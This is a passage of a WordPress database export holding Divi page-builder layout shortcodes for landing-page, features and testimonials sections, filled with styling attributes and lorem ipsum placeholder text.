parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_phone=\"41px|||\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#d4d4d4\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#d4d4d4\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Built to influence.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"77px||0px|\" custom_padding_last_edited=\"on|phone\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||0px|\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Designed for Any Purpose</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Custom CSS</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Free Google Fonts</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"68px||0px|\" custom_padding_last_edited=\"on|desktop\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||0px|\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Direct Editing</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Multiple Access Leveles</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Workflow</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"68px||45px|\" custom_padding_last_edited=\"on|desktop\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||0px|\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Fully responsive</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Content Restore</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Social Links</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||122px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"||45px|\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"rgba(48,48,48,0.17)\" show_divider=\"on\" height=\"42\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"28\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.4em\" text_font_size_last_edited=\"on|phone\"]\n\n<p><strong>Divi. </strong>Build beautiful Divi websites thanks to a modular content blocks that makes customization easy and enjoyable. Get your copy today.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#25 Testimonials\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#d5f1ee\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"119px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_phone=\"41px|||\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#93a4a2\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#93a4a2\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Testimonials.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"57px||119px|\" custom_padding_last_edited=\"on|desktop\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" gutter_width=\"2\" custom_padding_phone=\"0px||50px|\" background_color_1=\"#ffffff\" background_color_2=\"#ffffff\" background_color_3=\"#ede7f6\" custom_css_main_1=\"border-radius: 4px;||box-shadow: 2px 2px 2px #CAE6E3;\" custom_css_main_2=\"border-radius: 4px;||box-shadow: 2px 2px 2px #CAE6E3;\" custom_css_main_3=\"border-radius: 4px;\" custom_padding_tablet=\"40px||119px|\"][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/18.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"off\" align=\"center\" max_width=\"80px\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"54px||38px|\" custom_margin_last_edited=\"on|desktop\" custom_margin_phone=\"40px|||\" custom_margin_tablet=\"50px|||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||28px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\" max_width=\"78%\" custom_margin_last_edited=\"on|desktop\"]\n\n<p>\"I love Divi. I don\'t know what else to say. I couldn\'t have asked for more than this.\"</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Member name</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||62px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Country</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/19.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"off\" align=\"center\" max_width=\"80px\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"54px||38px|\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"40px|||\" custom_margin_tablet=\"50px|||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||28px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\" max_width=\"78%\" custom_margin_last_edited=\"on|desktop\"]\n\n<p>\"Divi is worth much more than I paid. I don\'t always clop, but when I do, it\'s because of Divi.\"</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Member name</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||62px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Country</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','#2 Landing Page','','publish','closed','closed','','2-landing-page-2','','','2016-08-02 00:08:42','2016-08-01 22:08:42','',0,'https://companyregistration.online/et_pb_layout/2-landing-page-2/',0,'et_pb_layout','',0),(26793,1,'2016-08-02 00:08:47','2016-08-01 22:08:47','[et_pb_section admin_label=\"#12 Features\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"89px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_phone=\"41px|||\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"540px\" text_line_height=\"1.5em\"]\n\n<p>Wireframe Kit Vol. 01</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Make your ideas a reality.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#9a9a9a\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"726px\" text_line_height=\"1.5em\"]\n\n<p>Build beautiful Divi websites thanks to a modular content blocks that makes customization easy and enjoyable. Get your copy today.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"53px||100px|\" custom_padding_last_edited=\"on|phone\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||14px|\" parallax_3=\"off\" parallax_method_3=\"off\" gutter_width=\"4\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/21.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"right\" disabled=\"off\" disabled_on=\"on||\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24%|||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Feature one</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#9a9a9a\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"5px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Phasellus viverra, ipsum quis congue lacinia, turpis purus feugiat odio, at ullamcorper purus purus.</p>\n\n[/et_pb_text][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/21.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"right\" disabled=\"off\" disabled_on=\"on||\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"90px|||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Feature two</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#9a9a9a\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"5px||10%|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Phasellus viverra, ipsum quis congue lacinia, turpis purus feugiat odio, at ullamcorper purus purus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/20.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"10%||10%|\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/21.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" disabled=\"off\" disabled_on=\"on||\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24%|||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Feature three</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#9a9a9a\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"5px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Phasellus viverra, ipsum quis congue lacinia, turpis purus feugiat odio, at ullamcorper purus purus.</p>\n\n[/et_pb_text][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/21.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" disabled=\"off\" disabled_on=\"on||\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"90px|||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Feature four</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#9a9a9a\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"5px||10%|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Phasellus viverra, ipsum quis congue lacinia, turpis purus feugiat odio, at ullamcorper purus purus.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#13 Features\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#3e51b5\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"119px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_phone=\"41px|||\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#7885cb\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#7885cb\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" 